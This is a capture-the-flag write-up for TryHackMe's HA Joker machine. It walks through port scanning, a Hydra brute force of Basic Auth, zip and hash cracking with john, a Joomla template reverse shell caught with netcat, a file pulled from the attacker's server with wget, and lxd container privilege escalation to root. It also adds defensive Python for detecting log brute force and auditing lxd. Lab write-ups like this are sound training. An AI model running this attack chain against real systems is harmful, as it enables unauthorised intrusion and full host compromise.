HA Joker CTF — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my HA Joker CTF — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan it with nmap for open ports:
nmap -A -p- -T4 -v <ip>
So there are 3 open ports.
The Apache version is 2.4.29. Because port 8080 returns a 403 code, only port 80 can be accessed without authenticating.
Next, I’ll find hidden dirs and files using gobuster.
gobuster dir -u http://<ip>:80/ -w /path-to-wordlist -x php,txt,html 2>/dev/null
So, the secret file is secret.txt, and the file that reveals information about the backend is phpinfo.php.
Let’s see the content of secret.txt:
So, the user for the next question is joker.
Next, the port on this machine that requires Basic Authentication is 8080 (as it returned code 403 in the nmap scan).
I’ll use Hydra to brute-force the password.
hydra -l joker -P rockyou.txt <ip> -s 8080 http-get /
After a while I’ve got the correct password. Log in to the website on port 8080:
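From the defender’s side, a Basic-Auth brute force like the one above leaves a very recognisable trail in the Apache access log: many failed-auth responses for the same path from one client in a short time. The following is an added example of mine, not part of the original write-up, that parses combined-format log lines and flags clients that exceed a threshold of 401/403 responses inside a sliding time window. The log lines, IPs, timestamps and user agent are all constructed for the demo; the threshold and window are assumed defaults you would tune for your own site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status")), "ua": m.group("ua")}

def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: max_failures_in_window} for every client that produced
    at least `threshold` failed-auth responses (401 or 403) within any window."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] in (401, 403):
            failures[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, times in failures.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):          # two-pointer sliding window
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits

def make_line(ip, second, status, path="/", ua="Mozilla/4.0 (constructed)"):
    """Build a constructed combined-format line for the demo (not a real capture)."""
    return (f'{ip} - - [12/Mar/2021:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'{status} 459 "-" "{ua}"')

# Constructed sample: one client fails 12 times in 22 seconds, another browses normally.
SAMPLE_LOG = [make_line("10.10.14.5", s, 401) for s in range(0, 24, 2)]
SAMPLE_LOG += [make_line("10.10.14.9", 5, 200, "/index.php"),
               make_line("10.10.14.9", 40, 401)]

if __name__ == "__main__":
    for ip, count in find_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}: {count} failed auth responses in 60s")
```

The same counting logic works on a real access_log read line by line; clients that trip the threshold are candidates for rate limiting or a fail2ban-style block rather than an immediate alert on every single 401.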
It’s a Joomla! CMS website:
Next, I will use nikto to check for files and dirs:
nikto -h http://<ip>:8080/ -id joker:<password>
So, /administrator is the admin directory.
The backup file’s name is backup.zip. Download it to your machine and use john to crack the zip’s password. First, use zip2john to convert the zip into a hash format john can understand:
zip2john backup.zip > zip.txt
Then, crack the password using this file:
john --wordlist=rockyou.txt zip.txt
After a while I’ve got the zip’s password:
Extract this zip using the password.
unzip backup.zip
Enter the password and it’ll be extracted into 2 folders: db and site.
Inside db is a .sql file. Read its content and you’ll find the super duper user as well as his password hash.
Next, I’ll crack the password hash using john. Copy the hash to a text file (mine is duper.txt) and:
john --wordlist=rockyou.txt duper.txt
After a while I’ve got the admin password:
Use the username admin and this password to log in to http://<ip>:8080/administrator.
Next, navigate to templates:
Click on the 1st template:
Edit the file “index.php” to spawn a reverse shell:
Save it. Start a listener on your machine:
nc -lvnp <port>
Then click “Template Preview” from your browser:
And you will get the shell into the machine!
So now, the owner of this session is www-data. The special group that this user belongs to is lxd.
You can spawn a tty shell using python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Next, I will use lxd to own root.
From your machine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
After the build has completed, a .tar.gz file will be created:
Now transfer this .tar.gz file into the target machine.
First, start an HTTP server on your machine:
python -m http.server 9000
or, with Python 2:
python -m SimpleHTTPServer 9000
Then, from the target machine:
wget <your-VPN-ip>:9000/alpine….tar.gz
As you can see, the file has been transferred successfully.
Now, import the image:
lxc image import ./alpine….tar.gz
You can check that the image has been imported using this command:
lxc image list
The alpine image has been imported. You can add an alias to it using this command:
lxc image alias create shell <fingerprint>
As you can see, I’ve added the name “shell” to my alpine image.
Then, follow these commands to own root:
lxc init <your-image-alias> ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
As you can see, I’ve spawned a shell as root! Get the final flag in /mnt/root/root:
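The root cause of this privilege escalation is visible in two places an administrator can audit: membership of the lxd group (www-data should never be in it) and containers created with security.privileged=true that mount the host’s / as a disk device. The following is an added example of mine, not part of the original write-up, that checks both: it reads /etc/group text for lxd members and parses the YAML-like output of `lxc config show <container>` (stdlib only, handling just the two-level structure that command prints, not arbitrary YAML). The /etc/group lines and the container config below are constructed samples modelled on the ignite container above.

```python
def lxd_group_members(group_file_text):
    """Return the users listed as members of the lxd group in /etc/group text."""
    for line in group_file_text.splitlines():
        fields = line.split(":")            # name:password:gid:member,member
        if len(fields) == 4 and fields[0] == "lxd":
            return [u for u in fields[3].split(",") if u]
    return []

def parse_lxc_config(config_text):
    """Minimal parser for `lxc config show` output: collects the top-level
    'config' keys and each entry under 'devices' with its properties."""
    result = {"config": {}, "devices": {}}
    section = device = None
    for raw in config_text.splitlines():
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        key, _, value = raw.strip().partition(":")
        value = value.strip().strip('"')
        if indent == 0:
            section, device = key, None
        elif section == "config" and indent == 2:
            result["config"][key] = value
        elif section == "devices" and indent == 2:
            device = key
            result["devices"][device] = {}
        elif section == "devices" and indent == 4 and device:
            result["devices"][device][key] = value
    return result

def audit_container(config_text):
    """Return a list of findings that make a container a host-root escape path."""
    cfg = parse_lxc_config(config_text)
    findings = []
    if cfg["config"].get("security.privileged") == "true":
        findings.append("security.privileged=true: root inside maps to root on the host")
    for name, dev in cfg["devices"].items():
        if dev.get("type") == "disk" and dev.get("source") == "/":
            findings.append(f"device '{name}' mounts the host root filesystem at {dev.get('path')}")
    return findings

# Constructed sample inputs (not captured from the target machine).
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:ubuntu\nlxd:x:108:www-data\nwww-data:x:33:\n"
SAMPLE_CONFIG = """architecture: x86_64
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
profiles:
- default
stateful: false
"""

if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP))
    for f in audit_container(SAMPLE_CONFIG):
        print("finding:", f)
```

On a real host you would feed it the output of `cat /etc/group` and, for each name from `lxc list`, `lxc config show <name>`; any non-admin account in the lxd group, or any privileged container with a disk device whose source is /, is the condition this write-up exploits.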
The end.
HAPPY HACKING